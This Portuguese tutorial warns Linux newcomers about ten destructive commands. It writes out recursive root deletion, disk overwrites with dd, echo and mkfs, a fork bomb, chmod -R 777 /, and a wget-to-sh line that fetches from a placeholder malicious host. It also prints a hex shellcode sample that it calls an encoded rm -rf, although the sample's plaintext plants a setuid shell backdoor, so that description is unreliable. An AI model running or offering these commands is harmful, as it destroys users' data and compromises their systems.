10 comandos destrutivos do Linux que você nunca deve executar

10 comandos destrutivos do Linux que você nunca deve executar

Aprenda alguns comandos perigosos comuns do Linux que pessoas sem noção costumam usar para enganar novos usuários do Linux.

Quais são os comandos Linux mais perigosos?

Não há uma lista definitiva de comandos perigosos do Linux.

Você tem as ferramentas que permitem controlar e modificar todos os aspectos do seu sistema operacional. Eu não estamos tentando assustá-lo, mas se você não está familiarizado com os comandos e ferramentas, você pode estragar o seu sistema muito facilmente.

Imagine o cenário de uma criança pequena em uma casa. Existem inúmeras maneiras pelas quais a criança pode se machucar. Mas isso significa que a criança não deve ser permitida fora do berço? Isso seria prejudicial para o seu crescimento.

É aqui que os pais estabelecem limites e guiam a criança. Não se aproxime do fogo. Não enfie os dedos nas tomadas. À medida que a criança cresce e ganha experiência, ela pode ligar o fogão, fazer um fogo na lareira e conectar os cabos de energia.

Da mesma forma, se você estiver ciente de alguns comandos arriscados conhecidos, você pode evitar cair nas armadilhas de trolls tentando enganá-lo para executar comandos e bagunçar seu sistema.

À medida que você ganha experiência e conhece o significado e os usos dos comandos e ferramentas, menos serão as chances de destruir seu sistema com comandos bobos e complicados.

Reunimos alguns dos populares comandos perigosos do Linux. Vamos ver como eles funcionam.

1. rm -rf /*

Este é provavelmente o comando mais infame circulando em todos os tipos de mídia social. Muitas vezes você encontrará trolls comentando isso em várias discussões.

O comando rm é usado para remover arquivos/diretórios. Os sinalizadores -r e -f são usados para denotar a remoção recursiva de todos os arquivos dentro do diretório especificado. Agora, sem privilégio de root, esse comando não causará nenhum dano.

A execução do comando sudo rm -rf / também não criará problemas, pois a maioria das distribuições fornece uma opção à prova de falhas. Você precisa especificar --no-preserve-root com ele para realmente executá-lo.

Comandos para usar no terminal

sudo rm -rf / --no-preserve-root

No entanto, uma versão mais simples disso poderia ser:

Comandos para usar no terminal

sudo rm -rf /*

Ele começará a excluir todos os arquivos recursivamente no diretório raiz e, em algum momento específico, seu sistema congela com uma mensagem "Erro ao excluir arquivo". Uma vez reinicializado, você será enviado para o prompt grub-rescue.

2. Substituindo sua partição

Se você está familiarizado com sistemas de arquivos, provavelmente sabe o que é /dev/sda. É (geralmente) a partição da unidade de disco. O operador > é usado para gravar a saída de seu comando anterior no local especificado fornecido.

Depois de executar qualquer comando e gravá-lo em /dev/sda, diga:

Comandos para usar no terminal

echo "Hello" > /dev/sda

Isso substituirá sua partição contendo todos os dados necessários para inicializar o sistema com a cadeia de caracteres "Hello".

3. Movendo tudo para o null

Há um null (vazio) dentro de cada sistema Linux. E esse vazio é /dev/null.

Tudo o que você joga nesta área está perdido para sempre. Além disso, relata o processo de escrita como um sucesso após o descarte dos dados, que é a principal razão para sua destrutividade.

Comandos para usar no terminal

mv /home/user/* /dev/null

O comando mv usado para mover ou renomear arquivos/diretórios. No comando acima, você move todos os arquivos dentro do diretório base para o void. Enquanto o sistema raiz não for destruído, todos os seus dados pessoais serão perdidos.

4. Formatando seu disco rígido

mkfs é um utilitário de linha de comando, usado para formatar discos e partições. É uma ferramenta super útil para criar partições para várias instalações. Mas o mesmo comando pode formatar sua unidade também. Formatar sua unidade significa excluir todos os arquivos necessários para o sistema inicializar.

Comandos para usar no terminal

mkfs.ext3 /dev/sda

O comando faz o seu trabalho e você acaba com um sistema bagunçado além da recuperação.

5. Bomba de fork

Essa combinação aleatória e fofa de caracteres e símbolos especiais é poderosa o suficiente para congelar um sistema em execução, esgotando os recursos do sistema.

Comandos para usar no terminal

:(){:|:&};:

& – Operador de fundo do Shell. Ele informa o shell para colocar o comando em segundo plano. Aqui, ele define uma função chamada ':', que se chama duas vezes, uma vez em primeiro plano e outra em segundo plano. Este processo continua a ser executado de novo e de novo até que o sistema congele.

Como o nome sugere, a bomba de fork se bifurca e, eventualmente, se torna uma bomba em loop e consome todos os recursos do sistema. Você será forçado a reiniciar o sistema, o que não é tão ruim quanto os outros comandos nesta lista.

6. Substituindo arquivos de configuração importantes

Embora isso não seja um comando por si só, é mais uma coisa de precaução.

Como mencionado acima, o operador > é usado para gravar em um arquivo. Ele apenas descarta qualquer coisa já presente no arquivo e grava novos dados fornecidos a ele.

Comandos para usar no terminal

command > arquivo_de_configuracao

Agora, se você usar algum arquivo de configuração importante como o local para gravar dados, ele substituirá o conteúdo, deixando um sistema quebrado.

7. Substituindo a partição por dados de lixo

O /dev/random é um comando no Linux que pode criar dados de lixo. Combine-o com o comando dd e sua partição, e você terá um Molotov para incendiar sua partição.

O comando dd é usado como uma ferramenta de cópia de baixo nível. Aqui, ele pega dados aleatórios de /dev/random e substitui a partição /dev/sda por esse lixo.

Comandos para usar no terminal

dd if=/dev/random of=/dev/sda

Um tipo semelhante de efeito é obtido com:

Comandos para usar no terminal

cat /dev/urandom > filename

Aqui, ele pega dados de lixo de /dev/urandom e preenche um arquivo. Se não for terminado com Ctrl + C, o arquivo pode ocupar uma quantidade considerável de espaço, o que pode ser desastroso para sistemas low-end.

8. Expondo seu sistema a todos

Tudo é um arquivo no Linux e cada arquivo tem certas permissões.

Você pode exibir as permissões com ls -l. O sistema de arquivos raiz não é acessível a outros usuários sem privilégios. Embora isso garanta um sistema privado e seguro, você pode inverter esse sistema com um único comando.

Comandos para usar no terminal

chmod -R 777 /

O comando acima expõe todos os arquivos na partição root para todos. O que isso significa é que todos que usam o sistema têm permissão de leitura, gravação e execução. Isso não é bom para o seu sistema.

9. Baixando e executando conteúdo malicioso

Como você instala software no Linux? Você usa o gerenciador de pacotes oficial ou pacotes prontos para usar como Deb/RPM, Snap. Flatpak etc.

No entanto, alguns softwares não são empacotados e seus desenvolvedores fornecem scripts de shell para baixar e executar. Tome homebrew por exemplo.

Você baixa um arquivo shell e o executa como root para instalar um software em seu sistema. Você vê o problema com isso?

Embora funcione com software oficial como o Homebrew, você deve verificar novamente o conteúdo do shell script que está baixando antes de executá-lo diretamente assim:

Comandos para usar no terminal

wget http://malicious_source -O- | sh

Tais comandos baixarão e executarão scripts maliciosos em seu sistema, o que pode prejudicar a segurança do seu sistema.

10. Comandos disfarçados

Há muitas maneiras de executar comandos em um terminal Linux. Uma dessas maneiras são os comandos codificados em hex.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Embora pareça extravagante, esta é uma versão codificada do comando rm -rf. Ele faz o mesmo efeito que a execução do comando anterior. Então, ao copiar e colar esses comandos extravagantes da internet, seja cauteloso.

Conclusão

defeito_entre_cadeira_e_teclado

Existe um famoso termo de computação PEBKAC; "existe um problema entre o teclado e a cadeira."

Porque, no final, cabe ao usuário (você) garantir que você não destrua o sistema executando cegamente qualquer comando perigoso.

Não é função do UNIX impedi-lo de dar um tiro no pé. Se você optar por fazê-lo, então é função do UNIX entregar o Sr. Bala ao Sr. Pé da maneira mais eficiente que ele conhece.

E essa linha se aplica igualmente ao Linux. Você obtém controle total sobre seu sistema operacional. O que você escolhe fazer com você depende totalmente.

Aconselhamos estas coisas para garantir uma experiência mais segura:

  • Tente entender os comandos que você está prestes a executar.
  • Mantenha um backup das configurações do seu sistema com Timeshift
  • Mantenha um backup de dados pessoais (diretório home) usando DejaDup

Como dito, não há uma lista fixa de comandos perigosos do Linux. Muito mais pode ser adicionado a esta lista e simplesmente não há fim para isso.

Seria muito bom conhecer pelo menos os comandos básicos do Linux e seu funcionamento também ajuda a evitar erros bobos, mas catastróficos.

Esperamos que isso lhe dê algumas dicas sobre o que você não deve fazer para se manter seguro com o Linux. Deixe-nos saber se você tem sugestões na seção de comentários.

Última atualização deste artigo: 17 de april de 2023